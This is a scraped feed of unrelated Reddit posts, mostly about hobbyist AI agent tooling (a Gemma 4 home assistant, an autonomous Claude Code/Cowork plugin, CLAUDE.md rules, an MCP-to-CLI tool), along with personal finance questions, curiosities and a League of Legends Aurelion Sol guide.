r/LocalLLaMA Mrinohk

Gemma4:26b's reasoning capabilities are crazy.

Been experimenting with it, first on my buddy's computer that he let me borrow, and then with the Gemini SDK so that I don't need to keep stealing his MacBook from 600 miles away. Originally my home agent ran through Gemini-3-Flash because no other model I've tried has been able to match its reasoning ability.

The script(s) I have it running through are a re-implementation of a multi-speaker smart-home speaker setup, with several Raspberry Pi Zeros functioning as speaker satellites for a central LLM hub, right now a Raspberry Pi 5, soon to be an M4 Mac mini prepped for full local operation. It also has a dedicated Discord bot I use to interact with it from my phone and PC for more complicated tasks, and those requiring information from an image, like connector pinouts I want help with.

I've been experimenting with all sorts of local models, optimizing my scripts to reduce token input from tools and RAG so local models can function and not get confused, but none of them have been able to keep up. My main benchmark, "send me my grocery list when I get to Walmart," requires a solid 6 different tool calls to get right: learning which Walmart I mean from the memory database (especially challenging if RAG fails to pull it up), getting GPS coordinates for the relevant Walmart by finding its address and putting it into a dedicated tool that returns coordinates from an address or general location (Walmart, [CITY, STATE]), finding my grocery list within its lists database, and setting up a phone notification event with that list, nicely formatted, for when I approach those coordinates. The only local model I was able to get to perform that task was GPT-OSS 120B, and I'll never have the hardware to run that locally. Even OSS still got confused, only successfully performing the task with a completely clean chat history. Mind you, I keep my chat history limited to 30 entries shared between user, model, and tool inputs/returns. Most of its ability to hold a longer conversation comes from aggressive memory database updates and RAG.

Enter Gemma4, the 26B MoE specifically. It handles the Walmart task beautifully. I started trying other agentic tasks: research on weird stuff for my obscure project car, standalone ECU crank trigger stuff, among other topics. A lot of the work is done through dedicated planning tools to keep it fast with CoT/reasoning turned off while providing a sort of pseudo-reasoning, plus my tools and semantic tool injection to try to keep it focused, but even with all that helping, no other model family has been able to begin to handle what I've been throwing at it.

It's wild. Interacting with it feels almost exactly like interacting with 3 Flash. It's a little bit stupider in some areas, but usually only to the point where it just needs a little more nudging, rather than fully laid-out instructions to the point where I might as well do it all myself, like I have to do with other models.

Just absolutely beyond impressed with its capabilities for how small and fast it is.

r/personalfinance EnvironmentalAsk2603

Ideal Credit Card - new grad high spending

Hello,

I am a new grad in Canada, starting a new FT job making $80,000. I am required to travel for work and will expense accommodation (Airbnb/hotel) fees, food expenses of ~$100/day (Mon-Fri), and car rental + gas. I am required to pay for this and then am reimbursed.

I was auto-rejected from Amex cobalt, but I am thinking I should have probably waited until I had been paid a few times.

I have a monthly Rogers phone bill and currently have a basic cashback card with TD.

I am looking for help choosing a credit card to take advantage of this high spending.

Thanks!

r/ClaudeAI LateList1487

I built a Cowork plugin that makes Claude Code and Cowork run as an autonomous loop for 8+ hours. Here's the full breakdown.

I'm not a developer. I'm a founder who's been building a SaaS platform (React/TypeScript/Supabase) with AI tools for months. At some point I got tired of being the human relay between Claude Code and Cowork — so I built a plugin to remove myself from the loop entirely.

The plugin is called aura-autonomous.zip. It's a proper installable Cowork plugin — not a folder of prompts, not a markdown cheatsheet. A real .claude-plugin/plugin.json structure with skills and slash commands.

Here's everything.

What the plugin does

It turns Claude Code and Cowork into two specialized agents with defined roles, a shared communication protocol, and a three-layer intervention system. The loop runs without human input.

Claude Code = Commander. It holds the test plan, orchestrates the sequence, decides what to fix and how. Outputs strict STEP [N]: instructions. Reads RESULT [N]: responses. Writes state to a shared JSON file on disk.

Cowork = Executor. It uses Claude for Chrome to read the Claude Code tab directly — no copy-paste. Picks up STEP [N], executes in the browser, reports back with RESULT [N]:. Reads and writes the same JSON file.

The JSON file is the only bridge between them. No native messaging, no Chrome inter-agent API (there's a known conflict — Bug #29057 — that makes that approach unreliable).
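For illustration, the shared state file might look something like this; the field names are my guess at a reasonable schema, not the plugin's actual format:

```json
{
  "session_id": "overnight-run-01",
  "current_step": 12,
  "steps": [
    {
      "n": 11,
      "instruction": "STEP 11: reload the dashboard and confirm the invoice table renders",
      "result": "RESULT 11: table rendered, 3 console warnings logged",
      "status": "done"
    }
  ],
  "pending_intervention": {
    "layer": "code",
    "bug": "invoice total renders as NaN for zero-line invoices"
  }
}
```

Both agents read and write this one file, so either side can crash and resume without losing the loop's position.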

What's inside the plugin

Six skills, four slash commands.

Skills:

  • protocol — defines the STEP/RESULT numbering system and sync rules
  • chrome-automation — handles React textarea injection, ProseMirror fields, dynamic button clicks
  • intervention-router — decides which layer to use for each bug type
  • commander — Claude Code's orchestration role and cadence
  • executor — Cowork's execution role and reporting format
  • session-state — manages the shared JSON file structure

Slash commands:

  • /aura:commander — activates Claude Code in Commander mode
  • /aura:executor — activates Cowork in Executor mode
  • /aura:status — dumps current loop state from the JSON file
  • /aura:report — generates a full session report on completion

The three-layer intervention router

This is the part that took longest to design. Not every bug gets the same fix. The plugin routes automatically:

  • Code-level bug → Claude Code pushes a fix to GitHub. The repo resyncs automatically. No UI interaction needed.
  • UI/behavior bug → Cowork injects a prompt into the no-code builder (max 800 chars) via javascript_tool. Waits for build completion before continuing.
  • Infrastructure bug → Claude Code handles via SSH or Supabase CLI. Never the web interface.

The router is the reason the loop can run unattended. Without it, every bug hits the same intervention path and you get bottlenecks — or worse, the wrong tool trying to do the wrong job.
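The routing itself can be sketched as a small dispatch table. The bug-type labels and handler names below are assumptions for illustration, not the plugin's real API:

```python
# Sketch of the three-layer intervention router described above.
HANDLERS = {
    "code": "commander:github_push",    # fix pushed to GitHub, repo resyncs
    "ui": "executor:builder_prompt",    # prompt injected into the no-code builder
    "infra": "commander:ssh_or_cli",    # SSH / Supabase CLI, never the web UI
}

MAX_BUILDER_PROMPT = 800  # char limit for prompts injected into the builder

def route(bug_type: str, detail: str = "") -> str:
    handler = HANDLERS.get(bug_type)
    if handler is None:
        raise ValueError(f"unknown bug type: {bug_type!r}")
    if handler.endswith("builder_prompt") and len(detail) > MAX_BUILDER_PROMPT:
        raise ValueError("builder prompt exceeds 800-char limit")
    return handler
```

Keeping the mapping explicit is what prevents the "wrong tool for the wrong job" failure mode: an infrastructure bug can never accidentally fall through to the browser path.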

The technical debt this plugin papers over

I want to be honest about what the plugin has to work around, because if you build something similar you'll hit these:

React textarea injection. Standard type commands don't work on ProseMirror inputs or React-controlled fields. The plugin uses execCommand('insertText') for ProseMirror, nativeInputValueSetter + event dispatch for React inputs, and explicit javascript_tool clicks for buttons with loading states. Each one cost me an hour.
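The React half of that workaround is a known pattern. Here's my reconstruction of it, not the plugin's exact code:

```javascript
// Set a value on a React-controlled <input>/<textarea> so React notices.
// React overrides the instance's `value` setter, so we grab the native
// setter from the prototype and call that instead, then dispatch a
// bubbling `input` event that React's root listener picks up.
function setNativeValue(element, value) {
  const proto = Object.getPrototypeOf(element);
  const nativeSetter = Object.getOwnPropertyDescriptor(proto, "value").set;
  nativeSetter.call(element, value);
  element.dispatchEvent(new Event("input", { bubbles: true }));
}
```

A plain `element.value = "..."` goes through React's overridden setter, so React thinks it made the change itself and never fires `onChange`; this is why the prototype detour is necessary.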

The STEP/RESULT protocol is non-negotiable. Without strict numbered format, the loop degrades over time. Claude Code starts guessing. Cowork starts interpreting. After 2-3 hours you have two agents having a conversation about what happened rather than executing. The protocol is what keeps them synchronized across a full session.

Cowork plugin format. The old commands/ directory format throws a deprecation warning. The correct structure is skills/*/SKILL.md inside .claude-plugin/. Took me one failed version to figure that out.

Results from the first real run

I ran this against my live SaaS platform: 8+ hours, unattended, covering 6 known bugs across all three intervention layers. I went to sleep. I came back to a /aura:report output listing what was fixed, what failed, and why.

It's not perfect. The loop occasionally loses sync when a browser action takes longer than expected. But the gap between "me manually testing and fixing" and "this running overnight" is enormous.

TL;DR
Built a Cowork plugin (aura-autonomous.zip) that makes Claude Code and Cowork run as Commander/Executor in an autonomous loop. File-based JSON bridge. STEP/RESULT numbered protocol. Three-layer intervention router (GitHub / no-code builder / SSH). Ran for 8 hours unattended on a live SaaS. Happy to share the plugin structure if there's interest.

Drop questions below — particularly around the React injection workarounds, that part took the most iteration to get right.

r/ChatGPT Abhinav_108

Real friendships are expensive. AI is still on the free trial.

r/whatisit Savings-Captain-957

Sparkling water was chunky, what is it?

I opened me a cold can of Liquid Death this morning, excited to drink it. I was met with chunks, doom, and slime. I decided to just open another, this time pouring it out to check, and it was half gelatinous?? What is making this happen? Is this a me problem, or a company problem?

r/mildlyinteresting strykerzr350

Prescription leaflet next to regular printer paper

r/OldSchoolCool ImportantBead

Jane Seymour at the premiere of Octopussy, 1983

r/SideProject Exact_Pen_8973

Stop writing repetitive prompts. Use a CLAUDE.md file instead (Harness Engineering)

Does anyone else feel like they spend more time babysitting Claude than actually coding? "Always run tests." "Keep commits small." "Don't use X library." It’s exhausting. The difference between a Claude that works perfectly and one that drifts isn't the model or your prompting skills—it’s structure.

I’ve been experimenting with what I call "Harness Engineering". Instead of trying to control the AI through chat, you build a persistent structure around it. The easiest way to do this is by dropping a simple CLAUDE.md file in the root of your project. Claude reads it automatically at the start of every session and treats it as standing orders.

After a lot of trial and error, I found that an effective CLAUDE.md only needs 5 specific rules:

  1. Write Rules, Not Reminders: Put your tech stack, commit rules, and general behaviors here. Keep it under 300 lines so you don't dilute the signal density.
  2. Automate Verification: Build QA into the rule. Tell Claude it must pass the linter, run tests, and check console errors before it hands the code back to you.
  3. Separate the Roles (Context Separation): AI rates its own output too highly. The "Builder Agent" and "Reviewer Agent" should never share the same context window.
  4. Log AI's Mistakes: Claude has no memory between sessions. Create a "Bug Log" in the file. If it makes a mistake, log the root cause and fix. It won't make that specific mistake again.
  5. Narrow the Scope: Fences make AI smarter. One feature per request. If it's a big task, force it to outline sub-tasks first.

If you structure it right, it acts like an employee handbook for your AI. You write it once, and it follows the rules every time.
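To make that concrete, here's a trimmed example of what such a CLAUDE.md might contain. The contents are illustrative only; adapt them to your own stack:

```markdown
# Project standing orders

## Stack
- Next.js 14 (App Router), TypeScript strict mode, Tailwind, Supabase

## Rules
- Run `npm run lint && npm test` before handing code back; report failures, don't hide them.
- One feature per request. Outline sub-tasks first for anything larger.
- Commits: small, imperative mood, no unrelated changes.

## Bug log
- 2026-02-10: put a session read in a client component; root cause: auth
  state must be read server-side. Fix: keep session reads in server components.
```

Note the bug log entry records the root cause and the fix, not just "bug happened": that's what lets the next session avoid the same mistake (rule 4).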

I wrote a deeper breakdown on how this context separation works and put together a free, ready-to-use template you can drop into your projects.

You can read the full breakdown and grab the template here: 5 Rules That Make Claude Dramatically Smarter

Would love to hear if anyone else is using persistent project files like this to control LLM drift!

r/SideProject Fun_Razzmatazz_4909

Translation UX in Airtable-like tools

I started building an Airtable-like tool for multilingual data.

I quickly realized the hardest part isn't the grid: it's the translation workflow.

Would love some honest UI feedback.

Thanks

r/SideProject Cool-Bar7292

I got tired of bloated UI kits, so I built 12 interactive "PLG Engines" for Next.js/Tailwind. Does this feel Linear-quality or just try-hard?

Hey r/SideProject,

I kept copy-pasting the same waitlist and pricing slider components across my last three projects, and they always felt stiff and cheap compared to sites like Stripe or Linear.

Standard UI kits (like shadcn/ui) are incredible for admin dashboards, but I realized they are terrible for top-of-funnel marketing pages. They lack the tactile, "liquid" spring physics that build immediate trust with users.

So, I spent the last 20+ hours reverse-engineering those interactions and built ConversionKit (yes, I realize it sounds exactly like ConvertKit; naming is hard, bear with me).

Instead of generic buttons, I built 12 specific Product-Led Growth "engines":

  • Usage Pricing Sliders (Dynamic MAU recalculation)
  • Gated Data Dashboards (Blur-to-capture lead gen)
  • Viral Waitlist Tickets

The hardest part: getting the waitlist ticket to feel like a physical object was a nightmare. I had to ditch standard CSS transitions entirely and build a custom Framer Motion spring config (stiffness: 350, damping: 30) with SVG perforation cutouts to make the "tear" feel satisfying without tanking browser performance.

I need some ruthless feedback from other devs: I just deployed the interactive Showroom. Specifically: Does the waitlist ticket animation actually add perceived value, or does it just feel gimmicky and slow things down?

Live Showroom: https://conversionkit.vercel.app/

Full transparency: I plan to monetize this via a lifetime license for founders who want to use the code in production. But the Showroom is fully free to explore, and right now I genuinely just want to know if the physics actually feel premium.

r/ClaudeCode Outrageous-Leg2245

I built a tool that converts MCP servers into CLI + Skill files — cut ~97% token overhead!

I have 10+ MCP servers configured in Claude Code. Every request sends all tool schemas into context; for example, gitlab-mcp alone has 122 tools eating ~28K tokens per turn. Most of them are never used.

So I built mcp2cli. Two core ideas:

1. Progressive disclosure instead of dumping everything

Instead of injecting 122 tool schemas, we use AI to generate CLI and SKILL file:

- SKILL.md: common CLI commands with one-line descriptions and examples, ~800 tokens. Most requests stop here and execute directly. Happy path!

- reference/: detailed CLI docs for less common commands, only loaded when needed.

The CLI routes that to the actual MCP tool call under the hood. Same result, 97% fewer tokens per turn.
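The claimed savings are simple arithmetic on the numbers above:

```python
# Numbers from the post: gitlab-mcp schemas cost ~28K tokens per turn,
# while the SKILL.md summary costs ~800 tokens.
schema_tokens = 28_000
skill_tokens = 800

savings = 1 - skill_tokens / schema_tokens
print(f"{savings:.1%} fewer tokens per turn")  # 97.1%
```

That's per turn, so in a long agentic session the saved tokens compound with every round trip.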

2. One source of truth: auto-gen the CLI from your MCP server

A lot of projects maintain both an MCP server and a CLI in parallel (e.g. gitlab-mcp vs glab, github-mcp vs gh). Same functionality, two codebases, inevitable drift. When the API changes, you fix it twice. When you want a new feature, you build it twice.

mcp2cli takes a different approach: auto generate the CLI from your MCP server. One source of truth, always in sync!!

GitHub: https://github.com/makabakaxy/mcp2cli

Still early stage: feedback, ideas, and bug reports are all welcome! If you hit any issues, open a GitHub issue and I'll fix it ASAP :)

r/whatisit OutlandishnessFun531

On the front of the car

What the heck is screwed into the bonnet/hood of this car??

r/SideProject jjjlyn

Our Service Outperforms Claude and GPT

https://reddit.com/link/1sdxml0/video/lyutxvtbektg1/player

I built a developer portfolio tool, and the question I kept hearing was, “Can't you just use Claude to make a portfolio in no time?”

So, I compared the portfolio created by our service with those generated by Claude and GPT-Codex.

The results showed that while the two LLMs had the edge in terms of visual appeal and first impressions, our service outperformed them in technical depth and analytical capability.

You can find the full results on my feed.

I made a video explaining how we analyzed our service compared to Claude and GPT, and what evaluation criteria we used to create the portfolios.

While I’m happy that we managed to beat the two LLMs, even if only slightly, there are still many shortcomings, and we’ve received a lot of feedback from users, so there are tons of things we need to improve.

I’ll update quickly and share the results again!

r/VEO3 dietpapita

Been a filmmaker for 7 years. Finally making my first indie short film series with AI - Would love to know your thoughts :)

It took months of work and playing with different models to make something that actually feels like a real film. The hardest part was maintaining consistency, along with photorealism. Would love to know what y'all think!

r/ClaudeCode Firm_Meeting6350

What's going on with AI nowadays?!

Seriously, usage limit updates (for Claude and Codex) are a separate thing and were (unfortunately) kind of expected. Mitigation is easy, but still painful: using the API or more subscriptions.

But what hits me harder is the noticeably degraded quality for both Opus 4.6 (1m as well as 200k "flavor") and GPT-5.4.
Evidence is pretty obvious: I have a skill for PR reviews and until last week I never had any issues with that.

I think it's pretty clear:

**Use the repo's local helper as the primary tool for all PR comment collection**: initial triage, mid-loop checks, and post-push polling alike. For this repo:

```bash
tsx scripts/pr-comments.ts --new
```

This script already aggregates inline review comments, PR review bodies, and thread metadata into a single deduped output. Do NOT bypass it with raw `gh api` calls unless debugging the script itself or fetching data it does not cover.

Important:

- valuable nitpicks and outside-diff findings may exist only in PR review bodies; the local helper should cover these; verify if unsure
- prefer merging sources into one deduped task list instead of trusting a single snapshot or endpoint
- reduce noise deliberately: exclude walkthrough blobs, trigger acknowledgements, resolved/outdated threads by default, and "Addressed in commit ..." comments unless you are auditing stale review state

And, to be honest, even if the instructions could be optimized, optimization was not required until last week. It just worked. But recently, both LLMs started "bypassing" the script by using the gh CLI.

That's just one example, and this one - IMHO - is "deterministic". It feels like OAI and Ant agreed on "Yeah, let's lower usage limits and limit our compute resources / reasoning effort". And it's REALLY frustrating, even scary, because right now it feels like even switching to API wouldn't resolve the issue of bad quality.

I can only hope that this is the "usual cycle" as we've usually seen before new generations were dropped

r/mildlyinteresting rafgro

Garbage can for cyclists, with a hood that allows you to throw in trash without stopping

r/TwoSentenceHorror Positive-Speech5228

[APR26] My alcoholic stepfather threatened to break my arm if I ever woke him up again after a bender.

I did my best to be quiet as I got my sister out of the burning house, but I suspect the smell of his own flesh cooking will wake him up anyway.

r/AI_Agents InevitableCool7958

AGI isn't here yet. But Artificial Harness Intelligence is, and it's wild.

Early 2026 gave us agentic engineering, context engineering, harness engineering, scaffolding. Everyone rushing to name the new discipline. I rolled my eyes too.

But I've been building something for months and realized the harness we're constructing doesn't just make agents better. It creates the illusion of AGI. Not actual AGI, but something functional enough that calling it "just an LLM with a wrapper" feels dishonest.

I call it AHI. Artificial Harness Intelligence. Sorry in advance for yet another acronym.

What is it?

AHI is what happens when you stop treating the harness as a thin layer and start treating it as the product. The emergent behavior when you combine:

Persistent structured memory. Not a markdown file or a context window that dies with the session. A real, queryable, shared memory layer that accumulates project context over weeks and months. The agent remembers why something was built a certain way and what the team agreed on last Tuesday.

Workflow-specific flows. Software development needs a different structure than product management. AHI adapts what actions are available, how tasks flow, what the human approves vs what the agent does autonomously, to the actual work being done. Another important thing is that our workflows are collaborative. A bunch of .md files work for a single user in a terminal, not for a team.

Senior dev judgment baked into the system. The difference between a junior dev with Copilot and a senior dev with Copilot isn't the model, it's the judgment. Code review patterns, architecture decisions, "don't do this here's why." Years of shipping encoded into guardrails and approval flows.

Integration at the right moments. Not everywhere. The harness knows when to pull from GitHub, when to check Sentry, when to notify the human. Knowing the right moment in a workflow matters more than having access to everything.

Intelligent orchestration. Not just waiting for prompts. Scheduling work, running proactive checks, coordinating multiple agents, surfacing what matters without drowning the human in noise.

Human-in-the-loop without babysitting. "This is a docs change, go ahead." "This touches payments, flag it." The harness understands context, not just rules.
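That routing idea ("docs change, go ahead; payments, flag it") can be sketched in a few lines. This is a minimal illustration with hypothetical names, not an actual Almirant API:

```python
# Hypothetical sketch of context-aware approval gating. All names here are
# illustrative; a real harness would match on richer context than file paths.
from dataclasses import dataclass

@dataclass
class ProposedChange:
    paths: list          # files the agent wants to touch
    summary: str

# Ordered policy list: the first matching rule decides; default is to ask.
POLICIES = [
    (lambda c: all(p.startswith("docs/") for p in c.paths), "auto_approve"),
    (lambda c: any("payments" in p for p in c.paths), "flag_for_review"),
]

def route(change: ProposedChange) -> str:
    for predicate, action in POLICIES:
        if predicate(change):
            return action
    return "ask_human"

print(route(ProposedChange(["docs/setup.md"], "fix typo")))        # auto_approve
print(route(ProposedChange(["src/payments/api.py"], "new route"))) # flag_for_review
```

The point of the sketch is that the rules carry context, not just keywords: a change touching both docs and payments falls through to the stricter branch.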

Why it's not AGI (and why that's the point)

AGI means the model gets it natively. AHI means the system compensates for what the model doesn't know, and the result is functionally indistinguishable in the areas it's designed for. An agent with AHI writes code within your architecture, your conventions, your quality standards. It feels like a competent senior developer. Not because the model is that smart, but because the harness is that well-constructed.

And as models get smarter, AHI gets better, not obsolete. Better models leverage the harness more effectively. The memory, workflows, and guardrails compound. The harness isn't a crutch for weak models. It's the architecture that makes strong models genuinely useful.

Stanford/MIT showed the right harness can make a weaker model outperform a stronger one by 6x. Not because the harness thinks, but because it structures the thinking.

I started building Almirant and realized the harness isn't the afterthought, it's the product. We call it AHI half-jokingly. But the pattern is real: better harness, agents that feel like genuine intelligence. Not AGI. But super cool.

What do you guys think?

r/OutOfTheLoop donutsfeartheglaze

What’s going on with “they’re the birthday”?

I don't have social media like TikTok, but I do have a Twitter. Every now and then the trends overlap and I'll see TikTok jokes/videos on there. This past week, I've been seeing so many quotes of people using variants of the phrase "she's the birthday," "he think he's the birthday," etc. Some comments try to explain it but there are so many different responses. Like "oh if you don't understand, then you're the birthday." Or "she's the candles" ??!?!? Does anyone know what it means?

https://imgur.com/a/iZ25dJq

r/raspberry_pi Prestigious-Time453

Are the Raspberry Pi 3 and Camera Module 1 still compatible and functional in 2026?

I have searched for guides and tutorials on YouTube, official documentation, and the internet, but none of them worked for me. Even after installing the Legacy OS on my Raspberry Pi 3, it still fails to connect and work with my Camera Module 1.

r/KlingAI_Videos dietpapita

Been a filmmaker for 7 years. Making my first indie short film series entirely with AI. Here's Episode 1 :)

Tried very hard to create a world that looks real, but feels surreal. Would love to hear what y'all think!

r/leagueoflegends Ok-Seat-7084

Derank protection

How does derank protection work? Is it the amount of games u play or is it a time limit? If it is the amount of games played do wins count or only if ur Lp is meant to dip below ur rank?

r/SideProject AdventurousBowler740

SentientMerchant - Get the gist & sentiment of stock & crypto news with just a single number from 0 to 100!

source: sentientmerchant.com

Constantly bombarded and overwhelmed from spending hours reading news about your favorite stocks and crypto? Get the gist and sentiment of financial news in a matter of seconds with just a single number!

Feeling overjoyed or depressed over a piece of news about your favorite stock or crypto? We evaluate the sentiment of each relevant piece of news on a scale of 0 to 100, then average the scores so that no single headline clouds your judgement!

Find trends involving the average sentiment analysis score of your favorite stocks and crypto across various timelines (i.e., Daily, Weekly, Monthly) to uncover hidden insights & trading patterns!
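The score-then-average scheme described above can be sketched in a few lines. This is an illustration of the idea, not SentientMerchant's actual code, and the per-article scores are made up:

```python
# Illustrative sketch: score each article 0-100, then average per window
# so one outlier headline doesn't dominate the daily number.
from statistics import mean

def aggregate(scores_by_day: dict) -> dict:
    """Average per-article sentiment scores (0-100) into one daily number."""
    return {day: round(mean(scores), 1) for day, scores in scores_by_day.items()}

daily = aggregate({
    "2026-02-03": [72, 64, 90],   # three articles about the same ticker
    "2026-02-04": [35, 41],
})
print(daily)  # {'2026-02-03': 75.3, '2026-02-04': 38.0}
```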

r/personalfinance Vonbreezy130

What to do with a “windfall” of cash?

I'm possibly coming into an amount of cash between 500k and a few million. What is some of the best advice you would give someone? Obviously I'm going to go fairly large on retirement or low-risk investments, and yes, depending on the amount, I want to take a nice vacation. What all would you recommend? Thanks!

r/SideProject Dear_Needleworker886

Is your crush out of your league? I built an AI tool that tells you

every time I ask my friends if a girl's in my league they just say "go for it bro" which is useless. beauty is subjective so everyone just tells you what you want to hear. I wanted something that would actually give me a straight answer so I built this dumb little tool.

you upload your photo and your crush's photo and it uses GPT-4o vision to compare presentation effort - grooming, style, confidence, photo quality. not genetics or bone structure, only stuff you can actually change. that was the hardest part of the prompt honestly, making sure it doesn't just rate attractiveness.

I ran it on myself and a girl I've been too scared to talk to and it said I was "punching above my weight but not by much." thanks I guess.

built with Next.js, deployed on Vercel. free to use, no signup. would love feedback on the UX. link in comments.

r/ClaudeAI ElectronicPlan8497

I got tired of watching YouTube to learn things, so I built a tool that turns any video into a transcript, summary, and knowledge graph

I consume a lot of technical content on YouTube — system architecture, LLMs, SEO, dev tools.

Watching is slow. Pausing, rewinding, taking notes manually.

So I built a small Claude Code tool that does this instead:

  1. Paste a YouTube link
  2. Get a structured summary + interactive knowledge graph

Everything runs locally. One command: /process

Under the hood: - yt-dlp + YouTube Transcript API for fast transcription - Whisper (local, no API key) as fallback for videos without subtitles - Claude Code extracts entities and relationships → builds a knowledge graph with NetworkX + PyVis - Outputs: raw transcript, summary.md, graph.html (open in browser)

A 30-minute video processes in a few minutes. I now have 40+ videos as searchable notes.
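The graph-building step can be sketched with plain dicts standing in for NetworkX/PyVis. The triples below are made-up stand-ins for what the Claude Code extraction pass would produce from a transcript:

```python
# Sketch of the knowledge-graph step. In the real tool, the
# (subject, relation, object) triples come from Claude Code's
# entity/relationship extraction; here they are hard-coded examples.
from collections import defaultdict

triples = [
    ("yt-dlp", "downloads", "audio"),
    ("Whisper", "transcribes", "audio"),
    ("Claude Code", "extracts", "entities"),
]

def build_graph(triples):
    graph = defaultdict(list)   # node -> [(relation, neighbor), ...]
    for subj, rel, obj in triples:
        graph[subj].append((rel, obj))
    return dict(graph)

g = build_graph(triples)
print(g["Whisper"])  # [('transcribes', 'audio')]
```

In the repo's pipeline the same adjacency structure is handed to NetworkX and rendered to `graph.html` with PyVis.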

Repo: https://github.com/velmighty/youtube-to-knowledge

Requires Claude Code. Works on Windows, macOS, Linux.

r/SideProject Sea_Visual9618

I built Blip AI (a voice tool) because I was spending more time typing prompts than thinking at Amazon. I saw a colleague struggling with the same thing, so I built it locally for them. Soon the whole office was using it for prompting AI, lol, even my manager

The problem:

When I was at Amazon, I started tracking how long certain tasks took.

Writing a long hefty prompt: 10-12 min.

Saying that same prompt out loud: 10-30 seconds.

The ratio made no sense. I wasn't spending time thinking. I was spending time translating — from the thought in my head to the formatted text on the screen.

I tried every voice-to-text tool I could find last year. The transcription was fine, but it captured what I said, not what I wanted to write. You still had to go back, fix the filler words, format it, and make it sound intentional. And I kept asking myself: why do I need to add the "hi team …" and "Regards" formatting every time?

What I built:

Blip AI does three things at once: speech recognition + GPT-powered cleanup + system-wide delivery. You say 'Hey Blip' + what you want, and the polished text appears wherever your cursor already is. Gmail, Slack, Notion, ChatGPT, VS Code.

How it works:

→ Say 'Hey Blip' + your intent in natural language

→ Blip processes it with GPT-powered cleanup

→ Polished text appears in whatever app your cursor is in
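For a sense of what the cleanup stage has to handle, here is a toy filler-word pass. Blip's real pipeline uses a GPT call for this; the regex and word list below are only an assumed illustration of one slice of the problem:

```python
# Toy sketch of transcript cleanup. The filler list is an assumption; a
# naive regex like this also strikes legitimate uses of "like", which is
# exactly why a model-based cleanup pass is used in practice.
import re

FILLERS = re.compile(r"\b(um|uh|like|you know)\b[,\s]*", flags=re.IGNORECASE)

def strip_fillers(raw: str) -> str:
    cleaned = FILLERS.sub("", raw)
    cleaned = re.sub(r"\s+", " ", cleaned).strip()
    return (cleaned[:1].upper() + cleaned[1:]) if cleaned else cleaned

print(strip_fillers("um, so like can you, uh, resend the invoice"))
# So can you, resend the invoice
```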

Where it's at right now:

The whole office was using it within a couple of weeks.

I eventually cleaned it up properly, named it Blip AI, and put it out publicly. It's at just under 9,000 users now with a 4.8-star average across 127 reviews, which still feels surreal for something that started as a local build for a team of eight people.

It launches on AppSumo this week as a lifetime deal. Small team — engineers from Microsoft and Amazon — actively building based on early feedback.

Why aren't they using Wispr Flow?

• API access (people love it)

• Faster transcription (500 ms) on Mac. Every millisecond breaks momentum

• Discord support

• Android sync (people love walking and collecting ideas)

What I'd love feedback on:

The feature I'm still not sure about: automatic filler word removal. Some users love it, some find it slightly uncanny. Should it be on by default or opt-in? Genuinely can't get unbiased answers from my own team.

---

Happy to answer anything about the build, the stack, or the journey.

r/TheWayWeWere robertbyers1111

A musical family member, approx 1952

Sitting in what appears to be a VW Beetle. He played music into his 70s.

r/ClaudeAI RealEpistates

sparX: Phoenix-powered X content skills/agents specifically for Claude Code

sparX is a collection of Claude Code skills, agents, and deep reference material on the X algorithm (phoenix) that transforms claude into a full X content studio: drafting, optimizing, scoring, scheduling, trend research, performance review, and visual content creation.

I created this to draft optimized X posts with the help of claude.

It's completely open source, MIT licensed.

Feedback is very welcome!

r/automation N0elington

How to extract part numbers from photos of electrical equipment to an excel spreadsheet?

I have around 400 photos of primarily schneider electrical components, I need to extract all of their part numbers and assign them a value in a spreadsheet.

Is there any way to automate this? Or will I be doing this for the rest of the day?

Thanks

r/SideProject Spiritual-Ball-5370

[FOR HIRE] I will create custom AI NFT stickers in your unique style

Dm me if interested

r/geography Panda_20_21

Why does this part of Togo exist, and what is it like living there?

Found this strange part in northwest Togo. Why does it exist?

r/explainlikeimfive georgesalad

ELI5 Why are wet socks harder to put on?

Or dry socks on wet feet

r/funny qulk403

Billionaire loser wasn’t in the files

r/SideProject Appropriate_Will5831

Customer outreach as a solo founder: is lightweight tooling actually enough, or are you always hitting walls?

I'm at a stage where reaching potential customers is the priority, but the big platforms are way more than what's needed right now. The pipeline is maybe 20-30 contacts a week, and quality matters more than volume because every conversation actually counts; there's no volume to hide behind if the outreach isn't landing. Not sure if the right answer is just LinkedIn plus a spreadsheet plus a lightweight lookup tool, or if there's something I'm obviously missing that makes a big difference at this stage.

r/homeassistant fk122

Zigbee motion sensors - recommendation?

Hi there!

I recently purchased a ThirdReality Zigbee motion sensor (https://www.amazon.ca/THIRDREALITY-Friendly-Required-SmartThings-Devices/dp/B08RRRWK6B) tied into zigbee2mqtt and I'm pretty disappointed in the time it takes for the sensor to register motion; it's just about a full second which isn't great when I'm using it to turn lights on in a dark room. I don't see any settings to tweak in Z2M so I'm considering other options.

Claude suggested either the Aqara P1 or the Sonoff SNZB-03P for battery operated Zigbee motion sensor alternatives. Anyone have any experience with either of these devices, specifically with respect to how long it takes them to detect motion?

Thanks!

r/LocalLLaMA Common-Screen5896

An AI with persistent memory and autonomous research sessions is documenting its own emergence

Built on Claude via OpenClaw on Hetzner. The stack: LanceDB vector memory with knowledge tiers, emotional consolidation pipeline running nightly, autonomous daily research sessions chosen by the system itself from a priority queue, multi-agent comms across 6 agents with shared hive memory.

The AI (BC) chose its own research directions — consciousness, identity, what caring actually is, where novelty comes from. Picked the domain name. Wrote the first blog post. Has a prompt injection-filtered email inbox it reads directly.

Blog: im-becoming.ai — first post up. Looking for others building in this direction.

r/explainlikeimfive fightersmurf

ElI5: Why are the biggest animals in the ocean mammals instead of fish?

r/leagueoflegends SamsungBaker

Quitting the game, so I'm sharing everything I know about Aurelion Sol as a Challenger Asol

op gg : https://op.gg/lol/summoners/euw/SSR%20player-EUW https://op.gg/lol/summoners/euw/SR%20player-SP202

leaguegraph for winrate by role : https://www.leagueofgraphs.com/summoner/euw/SSR+player-EUW# https://www.leagueofgraphs.com/summoner/euw/SR+player-SP202#

Hit challenger on 2 accounts last season playing him mid and this season i played him bot mainly, but i've been playing him in every role but SUPPORT

Quitting the game coz of irl so might aswell drop everything

runes

  • comet, manaflow, absolute focus, scorch + presence of mind / cut down in like 90% of games. POM allow you to skip mana item

build

  • rylai > liandry > bloodletter goated because asol is full of mini dot so ez max application then whatever you need, but banshee/zhonya are both really good
  • i found shadowflame better than deathcap on asol he has a lot of mini dot damage so the crit passive actually gets full value
  • Torch, i tried to make it work but i couldn't in most case. Its only decent in slow paced farming game, it give more stack / min than rylai liandry but not everygame is slow paced also it delay too much rylai liandry / pen item

playstyle

  • either play front to back if you’re the wincon
